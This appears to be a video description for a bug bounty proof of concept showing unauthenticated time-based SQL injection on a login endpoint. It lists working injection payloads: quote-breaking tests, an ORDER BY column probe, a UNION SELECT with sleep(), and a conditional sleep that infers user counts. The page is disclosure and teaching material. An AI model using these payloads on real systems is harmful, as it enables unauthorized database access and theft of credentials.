$3500 Bounty | Unauthenticated Time Based SQL Injection Bug Bounty POC | Private Bug Bounty Program

Опубликовано: 02 Ноябрь 2024
на канале: Abhishek Morla
5,012
200

-----------------------------------------------------------------------
Twitter:   / abhishekmorla  
Website: https://abhishekmorla.netlify.app/
Linkedin:   / abhishekmorla  
------------------------------------------------------------------------
This video provides an in-depth look at the intricacies of web security, focusing on a potential vulnerability in a specific web endpoint. The process of identifying and exploiting this vulnerability is explained in detail. You'll learn about balancing queries, the technique of commenting out parts of a query, identifying vulnerable columns, and effectively crafting custom queries for exploitation.

🌐 Key Exploration Areas:

Discovering a Vulnerable Endpoint
Techniques for Query Balancing
Methods to Comment Out Queries
Determining Vulnerable Columns
Creating Custom Exploitation Queries

⚠️ Disclaimer: This content is solely for educational purposes and should not be used for unauthorized activities. Always obtain proper authorization before performing any security testing.

🕒 Video Highlights:

Vulnerability Discovery
/interface/login/validateUser.php?u=

Query Balancing Explained
ERROR: query failed: select password,length(password) as passlength from users where username = '''

Commenting Queries for Testing
ERROR: query failed: select password,length(password) as passlength from users where username = ''--+

Column Identification Process
'+ORDER+BY+11--+

Exploiting Columns
'+UNION+ALL+SELECT+sleep(12),2--+-

Practical Exploitation Demonstration
if((select count(username) from users)='2',sleep(3),1),2--+-

💡 Educational Insight:
Gain valuable insights into web security and understand how to identify and mitigate vulnerabilities. This video is an essential resource for aspiring cybersecurity professionals and those interested in web security.

👍 Remember to like, share, and subscribe for more in-depth bug bounty poc.